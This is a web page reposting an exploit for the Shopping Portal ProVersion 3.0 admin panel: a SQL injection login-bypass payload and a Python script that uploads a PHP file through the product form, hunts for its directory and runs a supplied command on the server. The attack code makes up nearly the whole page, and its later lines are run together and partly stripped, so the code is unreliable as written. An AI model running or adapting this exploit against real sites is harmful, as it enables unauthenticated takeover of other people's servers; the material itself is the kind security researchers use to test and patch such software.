Shopping Portal ProVersion 3.0 – Authentication Bypass

0
258


# Exploit Title: Shopping Portal ProVersion 3.0 - Authentication Bypass
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/shopping-portal-free-download/
# Version: v4.0
# Category: Webapps
# Tested on: Xampp for Windows

# Description:
# Password and username parameters have sql injection vulnerability on admin panel.
# username: joke' or '1'='1'# , password: joke' or '1'='1'#
# Also, there isn't any restriction for malicious file uploading in the "Insert Product" section.
# This two vulnerabilities occur unauthenticated remote command execution.

#!/usr/bin/python

import requests
import sys
import urllib                          

if (len(sys.argv) !=3) or sys.argv[1] == "-h":
	print "[*] Usage: PoC.py rhost/rpath command"
	print "[*] e.g.: PoC.py 127.0.0.1/shopping ipconfig"
	exit(0) 

rhost = sys.argv[1]

command = sys.argv[2]



url = "http://"+rhost+"/admin/index.php"
data = {"username": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}

with requests.Session() as session:
	#login

	lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
	print ("[*] Status code for login: %s"%lg.status_code)
	if lg.status_code != 200:
		print ("One bad day! Check web application path!")
		sys.exit()

	#upload file

	files = {'productimage1': ('command.php', ''), 'productimage2': ('joke.txt', 'joke'), 'productimage3': ('joke.txt', 'joke')}
	fdata = {"category": "3", "subcategory": "8", "productName": "the killing joke", "productCompany": "blah", "productpricebd": "0", "productprice": "0", "productDescription": "blah
", "productShippingcharge": "0", "productAvailability": "In Stock", "productimage1": "command.php", "productimage2": "joke.txt", "productimage3": "joke.txt", "submit": ""} furl = "http://"+rhost+"/admin/insert-product.php" fupload = session.post(url=furl, files=files, data=fdata) print ("[*] Status code for file uploading: %s"%fupload.status_code) if fupload.status_code != 200: print ("One bad day! File didn't upload.") sys.exit() dir = 0 dirr = str(dir) #find uploaded file while True: el = eurl = session.get("http://"+rhost+"/admin/productimages/"+dirr+"/command.php") if el.status_code == 200: print "File Found!" print "Put On A Happy Face!rnrn" print ("uploaded file location: http://%s/admin/prductimages/%s/command.php?id=%s"%(rhost,dirr,command)) break else: print "trying to find uploaded file..." dir += 1 dirr = str(dir) #exec final=session.get("http://"+rhost+"/admin/productimages/"+dirr+"/command.php?cmd="+command) print final.text



Source link

LEAVE A REPLY

Please enter your comment!
Please enter your name here